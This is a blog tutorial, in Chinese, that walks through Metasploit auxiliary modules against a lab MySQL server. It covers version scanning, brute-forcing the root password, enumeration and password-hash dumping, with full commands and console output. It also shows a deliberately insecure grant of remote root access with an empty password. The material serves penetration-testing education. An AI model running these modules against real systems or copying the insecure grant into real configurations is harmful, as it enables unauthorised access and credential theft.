zoukankan      html  css  js  c++  java
  • Matasploit主机扫描 之 使用辅助模块进行服务扫描(以mysql为例)

    使用辅助模块进行服务扫描,以mysql服务为例

    搜索有哪些可用的mysql扫描模块

    root@kali:~# msfconsole #进入msf
    
    ...
    
    msf5 > search scanner/mysql #搜索有哪些可用mysql扫描模块
    
    Matching Modules
    ================
    
       #  Name                                               Disclosure Date  Rank    Check  Description
       -  ----                                               ---------------  ----    -----  -----------
       0  auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  No     MySQL Authentication Bypass Password Dump
       1  auxiliary/scanner/mysql/mysql_file_enum                             normal  No     MYSQL File/Directory Enumerator
       2  auxiliary/scanner/mysql/mysql_hashdump                              normal  No     MYSQL Password Hashdump
       3  auxiliary/scanner/mysql/mysql_login                                 normal  No     MySQL Login Utility
       4  auxiliary/scanner/mysql/mysql_schemadump                            normal  No     MYSQL Schema Dump
       5  auxiliary/scanner/mysql/mysql_version                               normal  No     MySQL Server Version Enumeration
       6  auxiliary/scanner/mysql/mysql_writable_dirs                         normal  No     MYSQL Directory Write Test

    1、mysql_version: 判断数据库是否允许外链,如果允许外链则可以显示版本号

    msf5 > use auxiliary/scanner/mysql/mysql_version #使用mysql_version模块判断数据库是否允许外链,如果允许外链则可以显示版本号
    
    msf5 auxiliary(scanner/mysql/mysql_version) > show options
    
    Module options (auxiliary/scanner/mysql/mysql_version):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT    3306             yes       The target port (TCP)
       THREADS  1                yes       The number of concurrent threads (max one per host)
    
    msf5 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_version) > run #此处表示目标机上的mysql不允许外链
    
    [*] 192.168.43.101:3306   - 192.168.43.101:3306 is running MySQL, but responds with an error: x04Host 'PCPZ8VZPNONCTTV' is not allowed to connect to this MySQL server
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    为了测试方便,我们可以手动把目标机上的mysql设置为:允许用户远程连接。

    mysql> grant all privileges on *.* to 'root'@'%' identified by '' with grant option;
    
    mysql> flush privileges;

    下面我们重新run一遍,成功显示版本号。

    msf5 auxiliary(scanner/mysql/mysql_version) > run
    
    [+] 192.168.43.101:3306 - 192.168.43.101:3306 is running MySQL 5.6.17 (protocol 10)
    [*] 192.168.43.101:3306 - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    2、mysql_login:暴力破解

    如果数据库允许外链,则能暴力破解密码

    这个模块没有默认字典,新建了一个简单的pass.txt

    msf5 > use auxiliary/scanner/mysql/mysql_login
       
    msf5 auxiliary(scanner/mysql/mysql_login) > show options 
    
    Module options (auxiliary/scanner/mysql/mysql_login):
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   false            no        Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
       DB_ALL_PASS       false            no        Add all passwords in the current database to the list
       DB_ALL_USERS      false            no        Add all users in the current database to the list
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT             3306             yes       The target port (TCP)
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads (max one per host)
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_AS_PASS      false            no        Try the username as the password for all users
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts
    
    msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
    USERNAME => root
    msf5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/pass.txt
    PASS_FILE => /root/pass.txt
    msf5 auxiliary(scanner/mysql/mysql_login) > run #或者使用exploit命令,一样的效果
    
    [+] 192.168.43.101:3306   - 192.168.43.101:3306 - Found remote MySQL version 5.6.17
    [!] 192.168.43.101:3306   - No active DB -- Credential data will not be saved!
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:1 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:2 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:3 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:4 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [-] 192.168.43.101:3306   - 192.168.43.101:3306 - LOGIN FAILED: root:5 (Incorrect: Access denied for user 'root'@'PCPZ8VZPNONCTTV' (using password: YES))
    [+] 192.168.43.101:3306   - 192.168.43.101:3306 - Success: 'root:'
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    成功破解出密码为空。

    3、mysql_enum:枚举数据库信息

    msf5 > use auxiliary/admin/mysql/mysql_enum  #注意这里的mysql_enum在admin目录下
    
    msf5 auxiliary(admin/mysql/mysql_enum) > show options 
    
    Module options (auxiliary/admin/mysql/mysql_enum):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       PASSWORD                   no        The password for the specified username
       RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT     3306             yes       The target port (TCP)
       USERNAME                   no        The username to authenticate as
    
    msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root #这里密码为空就不需要设置,如果不为空则还需要设置密码
    
    msf5 auxiliary(admin/mysql/mysql_enum) > run
    
    ...
    枚举的信息包括mysql版本号,操作系统架构,路径和密码hash等一些信息
    ...

    4、mysql_hashdump:导出密码hash

    这个函数可以导出在当前登陆用户权限下可以查看账户的密码hash,多少有点鸡肋

    msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump 
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > show options 
    
    Module options (auxiliary/scanner/mysql/mysql_hashdump):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       PASSWORD                   no        The password for the specified username
       RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT     3306             yes       The target port (TCP)
       THREADS   1                yes       The number of concurrent threads (max one per host)
       USERNAME                   no        The username to authenticate as
    
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS 192.168.43.101
    RHOSTS => 192.168.43.101
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
    USERNAME => root
    msf5 auxiliary(scanner/mysql/mysql_hashdump) > run #这里由于root的密码为空所以没有hash。
    
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [+] 192.168.43.101:3306   - Saving HashString as Loot: :
    [+] 192.168.43.101:3306   - Saving HashString as Loot: root:
    [*] 192.168.43.101:3306   - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
  • 相关阅读:
    [BTS2004]一步一步学习BizTalk2004 Sql Server Adapter
    [JWT]安装配置AdobeWorkFlowServer
    [BizTalk][MSMQAdapter]如何使用MSMQ的优先级设置呢?
    [JWS]Adobe WorkFlow 学习笔记(二)
    [RS]消息订阅应用实例(一)
    [BizTalk][Pipeline]使用Pipeline(一)
    ActiveDirectoryLib
    [ASP.NET]10 Tips for Writing HighPerformance Web Applications
    [UML]始
    [学习笔记][C++Primer Plus]String类的使用
  • 原文地址:https://www.cnblogs.com/zhengna/p/12856324.html
Copyright © 2011-2022 走看看